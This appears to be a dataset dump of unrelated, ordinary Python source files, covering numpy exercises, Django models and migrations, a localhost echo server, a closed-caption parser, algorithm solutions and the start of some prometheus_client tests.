text stringlengths 38 1.54M |
|---|
import numpy as np
def kwadraty(input_list):
    """Return the squares of the strictly positive numbers in input_list."""
    squares = []
    for value in input_list:
        if value > 0:
            squares.append(value ** 2)
    return squares
def wlasciwosci_macierzy(A):
    """Return basic properties of matrix A as a tuple:

    (element count, column count, row count, row means, column means,
     third column, fourth row).

    Assumes A has at least 3 columns and 4 rows, like the original.
    """
    rows, cols = A.shape
    return (
        A.size,          # total number of elements
        cols,            # number of columns
        rows,            # number of rows
        A.mean(axis=1),  # mean of each row
        A.mean(axis=0),  # mean of each column
        A[:, 2],         # third column
        A[3],            # fourth row
    )
def dzialanie1(A, x):
    """Return the dot product of A and x (matrix-vector product)."""
    return np.dot(A, x)
def dzialanie2(A, B):
    """Return the matrix product A·B."""
    return np.dot(A, B)
def dzialanie3(A, B):
    """Return the determinant of the product A·B."""
    return np.linalg.det(np.dot(A, B))
def dzialanie4(A, B, x):
    """Return (A·B)^T - B^T·A^T.

    NOTE(review): mathematically this difference is always a zero matrix
    ((AB)^T == B^T A^T). The parameter `x` is unused; it is kept so the
    call signature stays compatible with existing callers.
    """
    product = np.dot(A, B)
    return product.T - np.dot(B.T, A.T)
if __name__ == '__main__':
    # Demo: squares of the positive elements only
    input_list=[1,2,3,4,5, -2, 8]
    print(kwadraty(input_list))
    # 5x10 demo matrix holding the values 1..50
    M = np.arange(1, 51).reshape(5,10)
    print(M)
    A=np.array([[0,4,-2],[-4,-3,0]])
    B=np.array([[0,1],[1,-1],[2,3]])
    x=np.array([2,1,0])
    print(wlasciwosci_macierzy(M))
    print(dzialanie1(A,x))
    print(dzialanie2(A,B))
    print(dzialanie3(A,B))
    print(dzialanie4(A,B,x))
    A = np.array([[1, 1], [1, 2]])
    # On a plain ndarray, A**-1 is element-wise exponentiation,
    # not matrix inversion (translated from the original Polish comment)
    print(A)
    print(np.linalg.inv(A))
    matrix=np.matrix(A)
    # np.matrix overloads **, so matrix**-1 really is the matrix inverse
    print(matrix**-1)
    print("////////////////////////////////////////////////////")
    # Normal-equation style computation (X^T X)^-1 X^T y, first with ndarrays...
    x=np.array([[1,2,3],[1,3,6]])
    y=np.array([5,6])
    result=np.dot(np.dot(np.linalg.inv(np.dot(x.T,x)),x.T),y)
    print(result)
    # ...then the same formula written with np.matrix operator syntax
    X=np.matrix(x)
    Y=np.matrix(y).T
    result=(X.T*X)**-1*X.T*Y
    print(result)
from django.db import models
# Create your models here.
class Comment(models.Model):
    """A reader comment attached to a blog Post."""
    name = models.CharField(max_length=100)
    email = models.EmailField(max_length=255)
    url = models.URLField(blank=True)
    text = models.TextField()
    created_time = models.DateTimeField(auto_now_add=True)
    # BUG FIX: on_delete must be a deletion handler callable such as
    # models.CASCADE; the string "DESC" is not valid and fails at runtime.
    post = models.ForeignKey('blog.Post', on_delete=models.CASCADE)

    def __str__(self):
        # First 20 characters of the comment body, for admin/list display
        return self.text[:20]

    def get_belong_post(self):
        """Return the Post this comment belongs to."""
        return self.post
class Essay_Comment(models.Model):
    """A reader comment attached to a blog Essay."""
    name = models.CharField(max_length=100)
    email = models.EmailField(max_length=255)
    url = models.URLField(blank=True)
    text = models.TextField()
    created_time = models.DateTimeField(auto_now_add=True)
    # BUG FIX: on_delete must be a deletion handler callable such as
    # models.CASCADE; the string "DESC" is not valid and fails at runtime.
    essay = models.ForeignKey('blog.Essay', on_delete=models.CASCADE)

    def __str__(self):
        # First 20 characters of the comment body, for admin/list display
        return self.text[:20]

    def get_belong_essay(self):
        """Return the Essay this comment belongs to."""
        return self.essay
class leave_messages(models.Model):
    """A guestbook message not tied to any post or essay.

    BUG FIX: the class previously did not inherit from models.Model, so its
    fields were plain class attributes and no database table was created.

    NOTE(review): the non-PEP8 class name is kept on purpose — renaming it
    would change the model identity (and its DB table name).
    """
    name = models.CharField(max_length=100)
    email = models.EmailField(max_length=255)
    url = models.URLField(blank=True)
    text = models.TextField()
    created_time = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        # First 20 characters of the message body, for admin/list display
        return self.text[:20]
import socket
import thread
# Echo server (Python 2: uses the `thread` module): listen on localhost:5000.
host = '127.0.0.1'
port = 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('Socket Ready...')
s.bind((host, port))
print('Bind Ready...')
print('Listening...')
# backlog of 1 pending connection
s.listen(1)
def handle_client(client_socket):
    """Echo everything received on client_socket back to the sender.

    Runs until the peer closes the connection (recv returns an empty
    value), then closes the socket.
    """
    while True:
        chunk = client_socket.recv(1024)
        if not chunk:
            break
        print('Client says: ' + chunk)
        print('Sending: ' + chunk)
        client_socket.send(chunk)
    client_socket.close()
# Accept clients forever; each connection is served on a new thread.
while True:
    client_socket, addr = s.accept()
    print('Conexion from: '+str(addr))
    thread.start_new_thread(handle_client ,(client_socket,))
# NOTE(review): unreachable — the accept loop above never exits.
s.close()
# 4번은 문제 정확성은 다 맞추었는데 효율성 테스트에서 통과하지 못하였다.
# 효율성 테스트 1번까지만 어떻게 열심히해서 통과했는데 더 이상 통과할 수 없었다.
# python이라서 그런건가... c++로 해봐야하나라는 생각이 들기도 했고
# 아니면 아직 효율적으로 짜는 방법을 잘 모르는건가..라는 생각도 했다.
def solution(k, room_number):
    """Assign hotel rooms: each guest gets the requested room if free,
    otherwise the smallest free room with a higher number.

    PERFORMANCE FIX: the original scanned a k-sized list with list.index
    for every guest (O(n*k), failing the efficiency tests). This version
    uses a union-find "next free room" map with path compression, which is
    near-linear in the number of guests and independent of k. The outputs
    are identical.

    :param k: total number of rooms (1..k) — only bounds the valid requests
    :param room_number: requested room number per guest, in arrival order
    :return: list of actually assigned room numbers, in arrival order
    """
    # next_free[r] points toward the smallest unassigned room >= r
    next_free = {}

    def _find(room):
        # Follow the chain to the first unassigned room, compressing the
        # path so later lookups are O(1) amortized.
        path = []
        while room in next_free:
            path.append(room)
            room = next_free[room]
        for visited in path:
            next_free[visited] = room
        return room

    answer = []
    for wanted in room_number:
        assigned = _find(wanted)
        answer.append(assigned)
        # the assigned room now forwards to its successor
        next_free[assigned] = assigned + 1
    return answer
|
import collections
import unicodedata
from ..base import CaptionList, Caption, CaptionNode
from ..geometry import (
UnitEnum, Size, Layout, Point, Alignment,
VerticalAlignmentEnum, HorizontalAlignmentEnum
)
from .constants import (
PAC_BYTES_TO_POSITIONING_MAP, COMMANDS, PAC_TAB_OFFSET_COMMANDS,
MICROSECONDS_PER_CODEWORD,
)
# A pop-on caption cue: the instruction-node buffer plus its start/end times.
PopOnCue = collections.namedtuple("PopOnCue", "buffer, start, end")
class PreCaption:
    """
    The Caption class has been refactored and now its instances must be used as
    immutable objects. Some of the code in this module, however, relied on the
    fact that Caption instances were mutable. For backwards compatibility,
    therefore, this class was created to work as a mutable caption data holder
    used to eventually instantiate an actual Caption object.
    """
    def __init__(self, start=0, end=0):
        # start/end are in microseconds; 0 means "not set yet"
        self.start = start
        self.end = end
        # CaptionNode instances accumulated for this caption
        self.nodes = []
        self.style = {}
        self.layout_info = None

    def to_real_caption(self):
        """Build the actual (immutable) Caption from the mutable state."""
        return Caption(
            self.start, self.end, self.nodes, self.style, self.layout_info
        )
class TimingCorrectingCaptionList(list):
    """A caption list that fixes up end times as it grows.

    Whenever new captions are added, the previously added batch (the last
    `append`ed caption, or everything from the last `extend`) may have its
    end time set to the start of the incoming caption.

    None values and captions with no nodes are silently ignored.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # the captions added by the most recent append/extend call
        self._last_batch = ()

    def append(self, p_object):
        """Add a caption, first closing the previous batch's end time.

        Empty captions and None are dropped.

        :type p_object: Caption | None
        """
        if p_object is None or not p_object.nodes:
            return
        self._update_last_batch(self._last_batch, p_object)
        self._last_batch = (p_object,)
        super().append(p_object)

    def extend(self, iterable):
        """Add several captions; the first one's start time becomes the end
        time of the previously added batch.

        :param iterable: an iterable of Caption instances
        """
        keepers = [cap for cap in iterable if cap and cap.nodes]
        self._update_last_batch(self._last_batch, *keepers)
        self._last_batch = tuple(keepers)
        super().extend(keepers)

    @staticmethod
    def _update_last_batch(batch, *new_captions):
        """Set the end time of every caption in *batch* to the start time of
        the first caption in *new_captions*, when that batch is still open
        (end == 0) or the gap between them is negligibly small.

        The start time of the first caption in new_captions should never be
        0 — that would indicate an invalid SCC file.

        :type batch: tuple[Caption]
        :type new_captions: tuple[Caption]
        """
        if not (new_captions and new_captions[0] and new_captions[0].nodes):
            return
        if not batch:
            return
        first_new = new_captions[0]
        gap = first_new.start - batch[-1].end
        # close the batch if it was never closed, or if the gap to the new
        # caption is below the 5-codeword threshold
        if batch[-1].end == 0 or gap < 5 * MICROSECONDS_PER_CODEWORD + 1:
            for caption in batch:
                caption.end = first_new.start
class NotifyingDict(dict):
    """A dict that tracks one key as 'active' and calls registered
    observers whenever the active key changes.
    """
    # Unhashable sentinel: a dict can never be one of our keys, so this
    # value can never collide with a real active key.
    _guard = {}

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.active_key = self._guard
        self.observers = []

    def set_active(self, key):
        """Make *key* the active key, notifying observers on change.

        :param key: any hashable object
        :raises ValueError: if *key* is not present in the dict
        """
        if key not in self:
            raise ValueError('No such key present')
        if key == self.active_key:
            return  # no change, no notification
        for notify in self.observers:
            notify(self.active_key, key)
        self.active_key = key

    def get_active(self):
        """Return the value stored under the active key.

        :raises KeyError: if no active key has been set yet
        """
        if self.active_key is self._guard:
            raise KeyError('No active key set')
        return self[self.active_key]

    def add_change_observer(self, observer):
        """Register *observer*; it is called as observer(old_key, new_key)
        whenever the active key changes.

        :param observer: any callable accepting 2 positional arguments
        :raises TypeError: if *observer* is not callable
        """
        if not callable(observer):
            raise TypeError('The observer should be callable')
        self.observers.append(observer)
class CaptionCreator:
    """Creates and maintains a collection of Captions"""
    def __init__(self):
        self._collection = TimingCorrectingCaptionList()

        # subset of self._collection;
        # captions here will be susceptible to time corrections
        self._still_editing = []

    def correct_last_timing(self, end_time, force=False):
        """Called to set the time on the last Caption(s) stored with no end
        time

        :type force: bool
        :param force: Set the end time even if there's already an end time

        :type end_time: float
        :param end_time: microseconds; the end of the caption;
        """
        if not self._still_editing:
            return

        if force:
            # Select all last captions
            captions_to_correct = self._still_editing
        elif self._still_editing[-1].end == 0:
            # Only select the last captions if they haven't gotten their
            # end time set yet
            captions_to_correct = self._still_editing
        else:
            return

        for caption in captions_to_correct:
            caption.end = end_time

    def create_and_store(self, node_buffer, start, end=0):
        """Interpreter method, will convert the buffer into one or more Caption
        objects, storing them internally.

        This method relies on the InstructionNodeCreator's ability to generate
        InstructionNodes properly, so at this point we can convert
        _InstructionNodes nodes almost 1:1 to CaptionNodes

        :type node_buffer: InstructionNodeCreator

        :type start: float
        :param start: the start time in microseconds

        :type end: float
        :param end: the end time in microseconds
        """
        if node_buffer.is_empty():
            return

        caption = PreCaption()
        caption.start = start
        caption.end = end
        self._still_editing = [caption]

        for instruction in node_buffer:
            # skip empty elements
            if instruction.is_empty():
                continue

            # a repositioning command starts a brand-new caption; subsequent
            # nodes are appended to it instead of the previous one
            elif instruction.requires_repositioning():
                caption = PreCaption()
                caption.start = start
                caption.end = end
                self._still_editing.append(caption)

            # handle line breaks
            elif instruction.is_explicit_break():
                caption.nodes.append(CaptionNode.create_break(
                    layout_info=_get_layout_from_tuple(instruction.position)
                ))

            # handle open italics
            elif instruction.sets_italics_on():
                caption.nodes.append(
                    CaptionNode.create_style(
                        True, {'italics': True},
                        layout_info=_get_layout_from_tuple(
                            instruction.position
                        ))
                )

            # handle close italics
            elif instruction.sets_italics_off():
                caption.nodes.append(
                    CaptionNode.create_style(
                        False, {'italics': True},
                        layout_info=_get_layout_from_tuple(
                            instruction.position)
                    ))

            # handle text
            elif instruction.is_text_node():
                layout_info = _get_layout_from_tuple(instruction.position)
                caption.nodes.append(
                    CaptionNode.create_text(
                        instruction.get_text(), layout_info=layout_info),
                )
                # the caption's layout follows its (last) text node's layout
                caption.layout_info = layout_info

        self._collection.extend(self._still_editing)

    def get_all(self):
        """Returns the Caption collection as a CaptionList

        :rtype: CaptionList
        """
        caption_list = CaptionList()
        for precap in self._collection:
            caption_list.append(precap.to_real_caption())
        return caption_list
class InstructionNodeCreator:
    """Creates _InstructionNode instances from characters and commands, storing
    them internally
    """
    def __init__(self, collection=None, position_tracker=None):
        """
        :param collection: an optional collection of nodes to start from
        :param position_tracker: state machine consulted for the current
            position and for pending line breaks / repositionings
        :return:
        """
        if not collection:
            self._collection = []
        else:
            self._collection = collection

        self._position_tracer = position_tracker

    def is_empty(self):
        """Whether any text was added to the buffer"""
        return not any(element.text for element in self._collection)

    def add_chars(self, *chars):
        """Adds characters to a text node (last text node, or a new one)

        :param chars: tuple containing text (Unicode string)
        """
        if not chars:
            return

        current_position = self._position_tracer.get_current_position()

        # get or create a usable node: reuse the last node only if it is a
        # text node and no repositioning is pending
        if (self._collection and self._collection[-1].is_text_node()
                and not self._position_tracer.is_repositioning_required()):
            node = self._collection[-1]
        else:
            # create first node
            node = _InstructionNode(position=current_position)
            self._collection.append(node)

        # handle a simple line break
        if self._position_tracer.is_linebreak_required():
            # must insert a line break here, then continue in a fresh
            # text node
            self._collection.append(_InstructionNode.create_break(
                position=current_position))
            node = _InstructionNode.create_text(current_position)
            self._collection.append(node)
            self._position_tracer.acknowledge_linebreak_consumed()

        # handle completely new positioning
        elif self._position_tracer.is_repositioning_required():
            self._collection.append(
                _InstructionNode.create_repositioning_command(
                    current_position
                )
            )
            node = _InstructionNode.create_text(current_position)
            self._collection.append(node)
            self._position_tracer.acknowledge_position_changed()

        node.add_chars(*chars)

    def interpret_command(self, command):
        """Given a command determines whether to turn italics on or off,
        or to set the positioning

        This is mostly used to convert from the legacy-style commands

        :type command: str
        """
        self._update_positioning(command)

        text = COMMANDS.get(command, '')

        if 'italic' in text:
            if 'end' not in text:
                # italics turned on
                self._collection.append(
                    _InstructionNode.create_italics_style(
                        self._position_tracer.get_current_position())
                )
            else:
                # italics turned off
                self._collection.append(
                    _InstructionNode.create_italics_style(
                        self._position_tracer.get_current_position(),
                        turn_on=False
                    )
                )

    def _update_positioning(self, command):
        """Sets the positioning information to use for the next nodes

        :type command: str
        """
        if command in PAC_TAB_OFFSET_COMMANDS:
            # a tab offset shifts the column of the tracker's default position
            tab_offset = PAC_TAB_OFFSET_COMMANDS[command]
            prev_positioning = self._position_tracer.default
            positioning = (prev_positioning[0],
                           prev_positioning[1] + tab_offset)
        else:
            # PAC commands are looked up by their two 2-character halves
            first, second = command[:2], command[2:]

            try:
                positioning = PAC_BYTES_TO_POSITIONING_MAP[first][second]
            except KeyError:
                # not a positioning command; nothing to update
                return

        self._position_tracer.update_positioning(positioning)

    def __iter__(self):
        # iterate over the nodes with italics properly opened and closed
        return iter(_format_italics(self._collection))

    @classmethod
    def from_list(cls, stash_list, position_tracker):
        """Having received a list of instances of this class, creates a new
        instance that contains all the nodes of the previous instances
        (basically concatenates the many stashes into one)

        :type stash_list: list[InstructionNodeCreator]
        :param stash_list: a list of instances of this class

        :type position_tracker: .state_machines.DefaultProvidingPositionTracker
        :param position_tracker: state machine to be interrogated about the
            positioning when creating a node

        :rtype: InstructionNodeCreator
        """
        instance = cls(position_tracker=position_tracker)
        new_collection = instance._collection

        for idx, stash in enumerate(stash_list):
            new_collection.extend(stash._collection)

            # use space to separate the stashes, but don't add final space
            if idx < len(stash_list) - 1:
                try:
                    instance._collection[-1].add_chars(' ')
                except AttributeError:
                    # last element doesn't support add_chars - nothing to do
                    pass
        return instance

    def remove_ascii_duplicate(self, accented_character):
        """
        Characters from the Extended Characters list are usually preceded by
        their ASCII substitute, in case the decoder is not able to display
        the special character.

        This is used to remove the substitute character in order to avoid
        displaying both.

        :type accented_character: str
        """
        if self._collection and self._collection[-1].is_text_node() and \
                self._collection[-1].text:
            # strip the accents to recover the plain ASCII stand-in character
            ascii_char = unicodedata.normalize('NFD', accented_character)\
                .encode('ascii', 'ignore').decode("utf-8")
            if ascii_char and self._collection[-1].text[-1] == ascii_char:
                self._collection[-1].text = self._collection[-1].text[:-1]
def _get_layout_from_tuple(position_tuple):
"""Create a Layout object from the positioning information given
The row can have a value from 1 to 15 inclusive. (vertical positioning)
The column can have a value from 0 to 31 inclusive. (horizontal)
:param position_tuple: a tuple of ints (row, col)
:type position_tuple: tuple
:rtype: Layout
"""
if not position_tuple:
return None
row, column = position_tuple
# Horizontal safe area between 10% and 90%
horizontal = Size(80 * column / 32.0 + 10, UnitEnum.PERCENT)
# Vertical safe area between 5% and 95%
vertical = Size(90 * (row - 1) / 15.0 + 5, UnitEnum.PERCENT)
return Layout(origin=Point(horizontal, vertical),
alignment=Alignment(HorizontalAlignmentEnum.LEFT,
VerticalAlignmentEnum.TOP)
)
class _InstructionNode:
"""Value object, that can contain text information, or interpretable
commands (such as explicit line breaks or turning italics on/off).
These nodes will be aggregated into a RepresentableNode, which will then
be easily converted to a CaptionNode.
"""
TEXT = 0
BREAK = 1
ITALICS_ON = 2
ITALICS_OFF = 3
CHANGE_POSITION = 4
def __init__(self, text=None, position=None, type_=0):
"""
:type text: str
:param position: a tuple of ints (row, column)
:param type_: self.TEXT | self.BREAK | self.ITALICS
:type type_: int
"""
self.text = text
self.position = position
self._type = type_
def add_chars(self, *args):
"""This being a text node, add characters to it.
:param args:
:type args: tuple[str]
:return:
"""
if self.text is None:
self.text = ''
self.text += ''.join(args)
def is_text_node(self):
"""
:rtype: bool
"""
return self._type == self.TEXT
def is_empty(self):
"""
:rtype: bool
"""
if self._type == self.TEXT:
return not self.text
return False
def is_explicit_break(self):
"""
:rtype: bool
"""
return self._type == self.BREAK
def sets_italics_on(self):
"""
:rtype: bool
"""
return self._type == self.ITALICS_ON
def sets_italics_off(self):
"""
:rtype: bool
"""
return self._type == self.ITALICS_OFF
def is_italics_node(self):
"""
:rtype: bool
"""
return self._type in (self.ITALICS_OFF, self.ITALICS_ON)
def requires_repositioning(self):
"""Whether the node must be interpreted as a change in positioning
:rtype: bool
"""
return self._type == self.CHANGE_POSITION
def get_text(self):
"""A little legacy code."""
return ' '.join(self.text.split())
@classmethod
def create_break(cls, position):
"""Create a node, interpretable as an explicit line break
:type position: tuple[int]
:param position: a tuple (row, col) containing the positioning info
:rtype: _InstructionNode
"""
return cls(type_=cls.BREAK, position=position)
@classmethod
def create_text(cls, position, *chars):
"""Create a node interpretable as text
:type position: tuple[int]
:param position: a tuple (row, col) to mark the positioning
:type chars: tuple[str]
:param chars: characters to add to the text
:rtype: _InstructionNode
"""
return cls(''.join(chars), position=position)
@classmethod
def create_italics_style(cls, position, turn_on=True):
"""Create a node, interpretable as a command to switch italics on/off
:type position: tuple[int]
:param position: a tuple (row, col) to mark the positioning
:type turn_on: bool
:param turn_on: whether to turn the italics on or off
:rtype: _InstructionNode
"""
return cls(
position=position,
type_=cls.ITALICS_ON if turn_on else cls.ITALICS_OFF
)
@classmethod
def create_repositioning_command(cls, position=None):
"""Create node interpretable as a command to change the current
position
:type position:
"""
return cls(type_=cls.CHANGE_POSITION, position=position)
def __repr__(self): # pragma: no cover
if self._type == self.BREAK:
extra = 'BR'
elif self._type == self.TEXT:
extra = f'"{self.text}"'
elif self._type in (self.ITALICS_ON, self.ITALICS_OFF):
extra = 'italics {}'.format(
'on' if self._type == self.ITALICS_ON else 'off'
)
else:
extra = 'change position'
return f'<INode: {extra} >'
def _format_italics(collection):
    """Given a raw list of _InstructionNodes, returns a new equivalent list
    where all the italics nodes properly close and open.

    The list is equivalent in the sense that the SCC commands that would have
    generated the output list would have had the exact same visual effect, as
    far as italics are concerned. This matters because the raw commands read
    from the SCC can't be used directly by the writers for the other formats.

    Note: state machines were not used to manage italics because they already
    track position, and the interactions got too complex.

    :type collection: list[_InstructionNode]
    :rtype: list[_InstructionNode]
    """
    pipeline = (
        _skip_initial_italics_off_nodes,
        _skip_empty_text_nodes,
        # after this step the nodes are guaranteed to be properly ordered
        _skip_redundant_italics_nodes,
        # after this, italics are properly contained within their context
        _close_italics_before_repositioning,
        # every italics node is closed after this step
        _ensure_final_italics_node_closes,
        # finally, drop italics pairs with no visible effect
        _remove_noop_italics,
    )
    nodes = collection
    for step in pipeline:
        nodes = step(nodes)
    return nodes
def _remove_noop_on_off_italics(collection):
"""Return an equivalent list to `collection`. It removes the italics node
pairs that don't surround text nodes, if those nodes are in the order:
on, off
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = []
to_commit = None
for node in collection:
if node.is_italics_node() and node.sets_italics_on():
to_commit = node
continue
elif node.is_italics_node() and node.sets_italics_off():
if to_commit:
to_commit = None
continue
else:
if to_commit:
new_collection.append(to_commit)
to_commit = None
new_collection.append(node)
return new_collection
def _remove_noon_off_on_italics(collection):
"""Removes pairs of off-on italics nodes, that don't surround any other
node
:type collection: list[_InstructionNode]
:return: list[_InstructionNode]
"""
new_collection = []
to_commit = None
for node in collection:
if node.is_italics_node() and node.sets_italics_off():
to_commit = node
continue
elif node.is_italics_node() and node.sets_italics_on():
if to_commit:
to_commit = None
continue
else:
if to_commit:
new_collection.append(to_commit)
to_commit = None
new_collection.append(node)
if to_commit:
new_collection.append(to_commit)
return new_collection
def _remove_noop_italics(collection):
    """Return an equivalent list where italics node pairs that don't
    surround any text nodes have been removed.

    :type collection: list[_InstructionNode]
    :rtype: list[_InstructionNode]
    """
    without_on_off_pairs = _remove_noop_on_off_italics(collection)
    return _remove_noon_off_on_italics(without_on_off_pairs)
def _skip_initial_italics_off_nodes(collection):
"""Return a collection like the one given, but without the
initial <Italics OFF> nodes
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = []
can_add_italics_off_nodes = False
for node in collection:
if node.is_italics_node():
if node.sets_italics_on():
can_add_italics_off_nodes = True
new_collection.append(node)
elif can_add_italics_off_nodes:
new_collection.append(node)
else:
new_collection.append(node)
return new_collection
def _skip_empty_text_nodes(collection):
"""Return an iterable containing all the nodes in the previous
collection except for the empty text nodes
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
return [node for node in collection
if not (node.is_text_node() and node.is_empty())]
def _skip_redundant_italics_nodes(collection):
"""Return a list where the <Italics On> nodes only appear after
<Italics OFF>, and vice versa. This ignores the other node types, and
only removes redundant italic nodes
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = []
state = None
for node in collection:
if node.is_italics_node():
if state is None:
state = node.sets_italics_on()
new_collection.append(node)
continue
# skip the nodes that are like the previous
if node.sets_italics_on() is state:
continue
else:
state = node.sets_italics_on()
new_collection.append(node)
return new_collection
def _close_italics_before_repositioning(collection):
"""Make sure that for every opened italic node, there's a corresponding
closing node.
Will insert a closing italic node, before each repositioning node
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = []
italics_on = False
last_italics_on_node = None
for idx, node in enumerate(collection):
if node.is_italics_node() and node.sets_italics_on():
italics_on = True
last_italics_on_node = node
if node.is_italics_node() and node.sets_italics_off():
italics_on = False
if node.requires_repositioning() and italics_on:
# Append an italics closing node before the position change
new_collection.append(
_InstructionNode.create_italics_style(
# The position info of this new node should be the same
position=last_italics_on_node.position,
turn_on=False
)
)
new_collection.append(node)
# Append an italics opening node after the positioning change
new_collection.append(
_InstructionNode.create_italics_style(
position=node.position
)
)
continue
new_collection.append(node)
return new_collection
def _ensure_final_italics_node_closes(collection):
"""The final italics command needs to be closed
:type collection: list[_InstructionNode]
:rtype: list[_InstructionNode]
"""
new_collection = list(collection)
italics_on = False
last_italics_on_node = None
for node in collection:
if node.is_italics_node() and node.sets_italics_on():
italics_on = True
last_italics_on_node = node
if node.is_italics_node() and node.sets_italics_off():
italics_on = False
if italics_on:
new_collection.append(
_InstructionNode.create_italics_style(
position=last_italics_on_node.position,
turn_on=False
)
)
return new_collection
|
'''
Find all combinations for a,b,c,d between 1 <= a,b,c,d <= 1000,
that satisfy a^3 + b^3 = c^3 + d^3
'''
class Prob:
    """Find all (a, b, c, d) in [lo, hi] with a^3 + b^3 = c^3 + d^3."""

    @staticmethod
    def eval(lo, hi):
        """Return every quadruple [a, b, c, d] in [lo, hi]^4 satisfying
        a^3 + b^3 = c^3 + d^3, also printing the intermediate map and the
        result (preserving the original diagnostic output).

        BUG FIX: the result list was computed but never returned.

        :param lo: inclusive lower bound
        :param hi: inclusive upper bound
        :return: list of [a, b, c, d] quadruples
        """
        cube_sums = {}  # maps a^3 + b^3 -> list of [a, b] pairs
        for a in range(lo, hi + 1):
            for b in range(lo, hi + 1):
                # setdefault avoids the `in dict.keys()` double lookup
                cube_sums.setdefault(a ** 3 + b ** 3, []).append([a, b])

        out = []
        for c in range(lo, hi + 1):
            for d in range(lo, hi + 1):
                right_side = c ** 3 + d ** 3
                for pair in cube_sums.get(right_side, []):
                    out.append(pair + [c, d])

        print("abMap:")
        print(cube_sums)
        print("out: ", out)
        return out

    @staticmethod
    def test1(alg):
        """Smoke-test *alg* on the tiny range [1, 2].

        BUG FIX: the *alg* argument was previously ignored and Prob.eval
        was called directly; now the supplied callable is used.
        """
        lo = 1
        hi = 2
        return alg(lo, hi)
# Run the smoke test with the brute-force algorithm.
alg = Prob.eval
Prob.test1(alg)
|
from django.urls import path
from .views import index, posts
urlpatterns = [
    path('', index, name="index"),
    # NOTE(review): this route reuses the name "index"; reverse() lookups for
    # "index" can only resolve to one of the two routes — confirm the
    # duplication is intentional.
    path('home/', index, name="index"),
    # e.g. /3 -> posts view with post=3
    path('<int:post>', posts, name="posts"),
]
|
import logging
from trainer_v2.per_project.tli.bioclaim_qa.eval_helper import solve_bioclaim, batch_solve_bioclaim
from trainer_v2.per_project.tli.qa_scorer.nli_direct import NLIAsRelevance, get_entail_cont, get_entail, \
NLIAsRelevanceRev
from trainer_v2.per_project.tli.bioclaim_qa.path_helper import get_retrieval_save_path
from trainer_v2.chair_logging import c_log
from trainer_v2.keras_server.name_short_cuts import get_nli14_cache_client
from trec.trec_parse import write_trec_ranked_list_entry
def do_inner(run_name, split, score_getter):
    """Score the bioclaim split with NLI-as-relevance (reversed) and write
    the ranked list to the retrieval save path for "<run_name>_<split>".

    :param run_name: identifier used in logs and in the output file name
    :param split: dataset split to solve (e.g. "dev" or "test")
    :param score_getter: function mapping NLI output to a relevance score
    """
    c_log.info(f"nli_drect({run_name}, {split})")
    predict_fn = get_nli14_cache_client()
    scorer = NLIAsRelevanceRev(predict_fn, score_getter)
    ranked_list = batch_solve_bioclaim(scorer.batch_predict, split, run_name)
    write_trec_ranked_list_entry(
        ranked_list, get_retrieval_save_path(f"{run_name}_{split}"))
def main():
    """Run the nli_direct_rev scorer on both the dev and test splits."""
    c_log.setLevel(logging.DEBUG)
    run_name = "nli_direct_rev"
    for split in ("dev", "test"):
        do_inner(run_name, split, get_entail)
# Script entry point.
if __name__ == "__main__":
    main()
|
import shelve, sys

# Interactive index lookup tool (Python 2): opens the shelve index for the
# language given on the command line and repeatedly prompts for keys,
# printing the per-year counts stored under each key.
language = sys.argv[1]

INDEX_FILE = "/Users/marc/Desktop/FUSE/ontology_creation/data/patents/%s/idx/index" % language
INDEX = shelve.open(INDEX_FILE)
print "Searching index with %d keys" % len(INDEX.keys())

while True:
    print "Enter a key:"
    term = raw_input()
    # an empty line terminates the session
    if not term:
        break
    if INDEX.has_key(term):
        # INDEX[term] maps year -> occurrence count
        for y in sorted(INDEX[term].keys()):
            print "    %s %3d" % (y, INDEX[term][y])
    else:
        print "    Not in index"
|
# Generated by Django 2.0.4 on 2018-04-29 09:51
import datetime
from django.db import migrations, models
import magnum_online.functions
class Migration(migrations.Migration):
    # Auto-generated by Django 2.0.4; changes here should normally be
    # limited to comments.

    dependencies = [
        ('products', '0002_auto_20180429_1507'),
    ]

    operations = [
        # New lifecycle status flag for transactions; defaults to Incomplete.
        migrations.AddField(
            model_name='transaction',
            name='status',
            field=models.CharField(choices=[('I', 'Incomplete'), ('R', 'Rejected'), ('C', 'Canceled'), ('S', 'Completed')], default='I', max_length=3),
        ),
        # NOTE(review): default=datetime.datetime.now is a callable evaluated
        # per row, but it produces naive local time — timezone.now may be
        # intended if USE_TZ is enabled; confirm against project settings.
        migrations.AlterField(
            model_name='transaction',
            name='created',
            field=models.DateTimeField(default=datetime.datetime.now),
        ),
        # Unique 6-character hash generated by the project helper.
        migrations.AlterField(
            model_name='transaction',
            name='qr_hash',
            field=models.CharField(default=magnum_online.functions.randhash6, max_length=6, unique=True),
        ),
    ]
|
# -*- coding:utf-8 -*-
# Default AppConfig for the "operation" app (legacy, pre-Django 3.2 mechanism).
default_app_config = "operation.apps.OperationConfig"
from __future__ import unicode_literals
import sys
import time
from prometheus_client import (
CollectorRegistry, Counter, Enum, Gauge, Histogram, Info, Metric, Summary,
)
from prometheus_client.core import (
Exemplar, GaugeHistogramMetricFamily, Timestamp,
)
from prometheus_client.openmetrics.exposition import generate_latest
if sys.version_info < (2, 7):
# We need the skip decorators from unittest2 on Python 2.6.
import unittest2 as unittest
else:
import unittest
class TestGenerateText(unittest.TestCase):
def setUp(self):
self.registry = CollectorRegistry()
# Mock time so _created values are fixed.
self.old_time = time.time
time.time = lambda: 123.456
def tearDown(self):
time.time = self.old_time
def custom_collector(self, metric_family):
class CustomCollector(object):
def collect(self):
return [metric_family]
self.registry.register(CustomCollector())
def test_counter(self):
c = Counter('cc', 'A counter', registry=self.registry)
c.inc()
self.assertEqual(b'# HELP cc A counter\n# TYPE cc counter\ncc_total 1.0\ncc_created 123.456\n# EOF\n',
generate_latest(self.registry))
def test_counter_total(self):
c = Counter('cc_total', 'A counter', registry=self.registry)
c.inc()
self.assertEqual(b'# HELP cc A counter\n# TYPE cc counter\ncc_total 1.0\ncc_created 123.456\n# EOF\n',
generate_latest(self.registry))
def test_gauge(self):
